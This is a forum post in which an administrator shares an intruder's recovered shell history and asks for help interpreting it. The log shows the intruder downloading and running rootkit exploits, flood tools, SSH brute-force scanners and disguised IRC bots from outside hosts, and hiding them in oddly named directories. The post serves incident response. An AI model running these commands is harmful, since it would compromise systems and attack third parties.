This morning, somebody rootkited a machine I thought was reasonably secure (up-to-date ssh and apache, all other services blocked by shorewall). I discovered the intrusion before they had a chance to delete their .bash_history.
I'll be rebuilding the system (and another one they gained access to), but I'm sorta cuious as to what they were up to, and I'm wondering if their history points to any glaring vaulnerabilities that I should be aware of.
Any insight would be greatly appriciated!
Code: Select all
w
wget
cd /tmp
ls -a
uname -a
id
wget ps -x
ps -x
ps -awx
wget www.gas.as.ro/root
rm -rf 404-redirect.html
wget www.grutza.as.ro/root.tar.gz
tar zxvf root.tar.gz
cd root
ls -a
mv root.tar.gz /home
cd
ls -a
cd /mtp
cd /tmp
mv root.tar.gz /guest
passwd
w
w
cd
ls -a
wget www.grutza.as.ro/root.tar.gz
tar zxvf root.tar.gz
cd root
./hator
./memo
w
ls -al
./ptrace
w
ls -a
cd
cd root
./pt
./s
cd
rm -rf root root.tar.gz
cd /tmp
rm -rf root.tar.gz
wget www.grutza.as.ro/vadimII.tgz
tar zxvf vadimII.tgz
./vadimII
./vadimII 208.38.154.110 53
./vadimII 208.38.154.110 53 0
w
ps -x
cd ..
cd /tm,p
cd /tmp
ls -a
rm -rf vadimII vadimII.tgz
wget socks.idilis.ro/flood.tgz
rm -rf blockpage.cgi?ws-session=100716957
wget http://www.funet.fi/pub/crypt/cryptography/pgp-local/old/stealth.tar.gz
tar zxvf stealth.tar.gz
./stealth
cd stealth.c
./stealth.c
make
./stealth
./stealth
ls -al
./stealth 208.38.154.110 53
w
rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth
wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf
vi psybnc.conf
./psybnc
kill -9 6239
vi psybnc.conf
./psybnc
w
netstat -a
ls -a
ps -x
kill -9 6242
w
whois JustBodo.org
w
w
hostaname a
w
w
exit
w
uname -a
cd /tmp
wget www.kriminal.as.ro/bot.tar.gz
tar zxvf bot.tar.gz
cd bot
ls -a
pico mech.set
vi mech.set
vi bbb.usr
./initg
ps -x
kill -9 6408
kill -9 6411 6414
ls -a
cd
ls -a
cd /tmp
ls -a
rm -rf bot
rm -rf bot.tar.gz
wget www.grutza.as.ro/mech.tgz
tar zxvf mech.tgz
cd mech
ls -a
pico mech.set
vi mech.set
ls -a
vi ftpusers-
./mech
ps -x
kill -9 6454 6452
w
ps -x
uname -a
id
w
cd /tmp
ls -al
cd mech
ls -al
less ftpusers-
less mech.set
pico ftpusers-
vi ftpusers-
vi mech.set
vi mech.set
mv mech bash-
./bash-
./bash-
./bash-
passwd
exit
exit
w
ps -awx
w
w
wget
wget www.grutza.as.ro/stealth
w
w
w
w
w
cd /tmp
l s-a
ftp www.icekid.dap.ro
w
wget wget www.icekid.dap.ro/gas.tar.gz
wget 80.96.205.14/gas.tar.gz
w
w
w
w
exit
a
ls -al
useradd
cd ..
wget www.geocities.com/catalinum/xnet.tar.gz
tar xzvf xnet.tar.gz
w
uname 0a
uname -a
cd /tmp
ps -x
ls -al
cd .ssh
mkdir .ssh
cd .ssh
wget www.gas.as.ro/root.tar.gz
tar xzvf root.tar.gz
cd root
./hator
./memo
./s
./km3
ls
./pt
./ptrace
./e
cd /tmp/.ssh
cd ssh/
mv r00t muie
./muie 212.200 -d 4
cd /tmp
cd .ssh/
cd ssh/
ls -al
./muie 215.125
./muie 215.125 -d 4
./muie 215 -d 4
./muie 212 -d 4
cd /tmp.ssh
cd /tmp..ssh
cd /tmp/.ssh
wget www.geocities.com/dorofteig/em.tar.gz
tar xzvf em.tar.gz
cdem
cd em
cd emech/
pico emech.users
vi emech.users
cat mech.session
ls
vi mech.session
./httpd
./httpd
exit
cd /tmp
cd .ssh
ls -a
ps -x
kill -9 26396
kill -9 26398
kill -9 4618
kill -9 4626
cd emech/
ls -a
pico emech.users
vi emech.users
./httpd
./httpd
./httpd
cd ..
cd ssh
ls -a
cd ..
wget scanners.go.ro/wow.tgz
wget scanners.go.ro/wow.tgz
./brute
cd ssh/
./brute
./muie 64.51 -d 4
cd /tmp/ssh
cd /tmp/.ssh
ftp ftp2.megaftpservers.com
ftp ftp2.megaftpservers.com
ls -a
mkdir wow
mv go.sh wow
cd wow
ls -a
cd ..
mv assh wow
mv pscan2 wow
mv ss eoe
mv ss wow
mv assh wow
cd wow
ls
cd ..
mv auto wow
ls -a
mc sshf wow
mv sshf wow
cd wow
ls -a
chmod +_x*
chmod +x *
ls -a
./assh 128.38
./assh 67.121
cd /tmp/.ssh
ls -a
ftp ftp2.megaftpservers.com
w
cd /tmp
cd .ssh
ls -a
rm -rf ssh xnet.tar.gz
ftp ftp2.megaftpservers.com
cd /tmp
cd " "
ftp ftp2.megaftpservers.com
ls -a
chmod +x 8
chmod +x *
ls -a
wget www.xeofreestyle.com/2000/hybrid.swf
wget www.xeofreestyle.com/2000/hybrid.swf
wget www.xeofreestyle.com/2000/hybrid.swf
ls -a
rm -rf hyb*
ls -a
./assh 212.16
w
id
cat /etc/issue
cd /tmp
ls -a
cd " "
mkdir " "
cd " "
wget
wget lamisto.ws/wow.tgz
ls -a
rm -rf wow.tgz
rm -rf wow.tar.gz
wget lamisto.ws/wow.tar.gz
rm -rf wow.tar.gz
ftp lamisto.ws
ftp ftp.lamisto.ws
ftp ftp2.megaftpservers.com
passwd
cd /tmp
w
who
cd " "
ls -a
./assh 212.16
ls -a
ftp ftp2.megaftpservers.com
cd /tmp
cd " "
ftp ftp.megaftpservers.com
ftp ftp2.megaftpservers.com
ls -a
chmod +x *
./sshf
./assh 212.16
ls -a
./assh 212.17
./assh 216.0
cd /tmp
mkdir " "
cd " "
ls -a
mkdir php
cd php
wget unixshellz.org/sanders/php.tgz
tar xzvf php.tgz
ftp 212.16.54.197
cd /tmp
ls -a
cd " "
ls -a
cd php
ls -a
ftp sv1.33747.ip.nltree.nl
ftp 63.247.76.5






